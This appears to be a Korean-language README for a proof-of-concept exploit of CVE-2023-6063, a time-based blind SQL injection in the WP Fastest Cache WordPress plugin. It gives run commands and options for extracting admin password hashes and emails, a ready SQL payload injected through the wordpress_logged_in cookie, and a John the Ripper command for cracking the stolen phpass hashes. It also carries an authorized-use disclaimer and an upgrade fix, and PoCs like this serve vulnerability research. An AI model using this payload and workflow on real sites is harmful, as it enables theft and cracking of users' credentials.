
CVE-2023-6063에 대한 개념 증명, WP Fastest Cache ≤1.2.2의 시간 기반 블라인드 SQL 인젝션 취약점.
CVE-2023-6063에 대한 PoC(Proof of Concept)로, WP Fastest Cache ≤1.2.2의 시간 기반 블라인드 SQL 인젝션 취약점입니다. wordpress_logged_in 쿠키를 악용하여 wp_users 테이블에서 해시된 비밀번호(user_pass)와 이메일(user_email)을 추출합니다.
이 스크립트는 다음을 추출합니다:
종속성 설치 (설치되지 않은 경우):
pip install -r requirements.txt
기본 사용법:
python3 poc.py -u https://vulnerable-website.com --username admin --delay 5
전체 옵션:
-h, --help 도움말 메시지를 표시하고 종료합니다
-u URL, --url URL CVE-2023-6063 테스트를 위한 WordPress 전체 URL
--username USERNAME 해시된 비밀번호를 추출할 사용자 정의
-d DELAY, --delay DELAY
웹 응답 대기 시간 (기본값 5, 최소 2)
-H HASH, --hash HASH wp_users 테이블에 대해 검증할 해시, 해시에 특수 문자가 포함된 경우 작은따옴표 사용 -> '<hash>'
--domain DOMAIN 이메일 검증을 위한 도메인 이름
-c COOKIE, --cookie COOKIE
컨텍스트에서 다른 경우 쿠키 이름 지정
--status-code STATUS_CODE
특정 긍정 상태 코드 사용, 기본값 200
--debug 더 자세한 출력
--just-hash 해시된 비밀번호만 추출
--just-email 사용자의 이메일 값만 추출
관리자 사용자를 위한 데모입니다
https://github.com/user-attachments/assets/21ea643d-3b11-401f-813f-b85abdb05890
해시된 비밀번호가 유출된 경우, 취약한 비밀번호라면 PHPass 알고리즘으로 복호화하기 위해 john 또는 hashcat을 사용하세요.
John 예시:
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=phpass
WordPress용 WP Fastest Cache 플러그인(≤1.2.2)은 wordpress_logged_in 쿠키를 통해 인증되지 않은 블라인드 SQL 인젝션에 취약합니다. 공격자는 SQL 쿼리에서 시간 기반 지연(SLEEP())을 이용하여 wp_users 테이블에서 민감한 데이터(예: 비밀번호 해시, 이메일 주소)를 추출할 수 있습니다.
" AND (IF((SELECT user_pass FROM wp_users WHERE user_login="admin") LIKE 'a%', SLEEP(5), 0))-- -
🚨 면책 조항: 이 정보는 적절한 승인을 받은 윤리적 보안 테스트 목적으로만 사용하십시오. 무단 악용은 불법입니다.
WP Fastest Cache를 버전 >1.2.2로 업그레이드하세요.